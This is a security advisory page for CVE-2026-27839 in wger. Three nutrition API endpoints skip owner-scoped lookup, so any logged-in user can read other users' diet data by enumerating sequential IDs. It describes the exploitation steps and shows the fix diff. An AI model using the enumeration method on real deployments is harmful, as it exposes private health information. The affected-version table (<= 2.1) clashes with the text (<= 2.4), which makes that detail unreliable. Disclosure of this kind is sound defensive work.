wger: IDOR in nutritional_values endpoints exposes private dietary data via direct ORM lookup
Description
wger is a free, open-source workout and fitness manager. In versions up to and including 2.4, three nutritional_values action endpoints fetch objects via Model.objects.get(pk=pk) — a raw ORM call that bypasses the user-scoped queryset. Any authenticated user can read another user's private nutrition plan data, including caloric intake and full macro breakdown, by supplying an arbitrary PK. Commit 29876a1954fe959e4b58ef070170e81703dab60e contains a fix for the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
In wger up to 2.4, three nutritional_values API endpoints use raw ORM get() without user-scoped queries, allowing any authenticated user to read arbitrary users' private nutrition data via PK enumeration.
Vulnerability Description: Three nutritional_values action endpoints in wger's nutrition API (NutritionPlanViewSet, MealViewSet, MealItemViewSet) bypass object-level permissions by directly calling Model.objects.get(pk=pk) instead of using self.get_object() to enforce user scoping. This allows any authenticated user to supply an arbitrary primary key (PK) and retrieve another user's private nutrition plan data, including caloric intake and macro breakdown. The flaw affects versions up to and including 2.4 [1][3].
Exploitation Method: An attacker only needs a valid authentication token (e.g., from a registered account). The PKs are sequential integers, making enumeration trivial. By sending GET requests to endpoints like /api/v2/nutritionplan/{pk}/nutritional_values/, the attacker can iterate through PKs and obtain other users' dietary data without any victim interaction [3]. Open registration by default increases the attack surface.
Impact: Exposure of sensitive dietary and health information: daily caloric intake, protein, carbohydrates, fat, fiber, sodium, and full meal composition. This violates user privacy and could be leveraged for targeted harassment or competitive advantage in fitness contexts [3].
Mitigation: The fix, introduced in commit 29876a1954fe959e4b58ef070170e81703dab60e, replaces the raw ORM call with self.get_object(), which applies the correct owner-based queryset filtering [4]. Users should update to a patched version or apply the commit manually. No workaround is available; the endpoints are fixed only after patching.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
wgerPyPI | <= 2.1 | — |
Affected products
2- wger-project/wgerv5Range: <= 2.4
Patches
129876a1954feUse get_object() to retrieve the user's data
1 file changed · +3 −3
wger/nutrition/api/views.py+3 −3 modified@@ -298,7 +298,7 @@ def nutritional_values(self, request, pk): Return an overview of the nutritional plan's values """ serializer = NutritionalValuesSerializer( - NutritionPlan.objects.get(pk=pk).get_nutritional_values()['total'], + self.get_object().get_nutritional_values()['total'], ) return Response(serializer.data) @@ -353,7 +353,7 @@ def nutritional_values(self, request, pk): """ Return an overview of the nutritional plan's values """ - serializer = NutritionalValuesSerializer(Meal.objects.get(pk=pk).get_nutritional_values()) + serializer = NutritionalValuesSerializer(self.get_object().get_nutritional_values()) return Response(serializer.data) @@ -400,7 +400,7 @@ def nutritional_values(self, request, pk): """ Return an overview of the nutritional plan's values """ - return Response(MealItem.objects.get(pk=pk).get_nutritional_values()) + return Response(self.get_object().get_nutritional_values()) class LogItemViewSet(WgerOwnerObjectModelViewSet):
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- github.com/advisories/GHSA-g8gc-6c4h-jg86ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-27839ghsaADVISORY
- github.com/wger-project/wger/commit/29876a1954fe959e4b58ef070170e81703dab60eghsax_refsource_MISCWEB
- github.com/wger-project/wger/security/advisories/GHSA-g8gc-6c4h-jg86ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.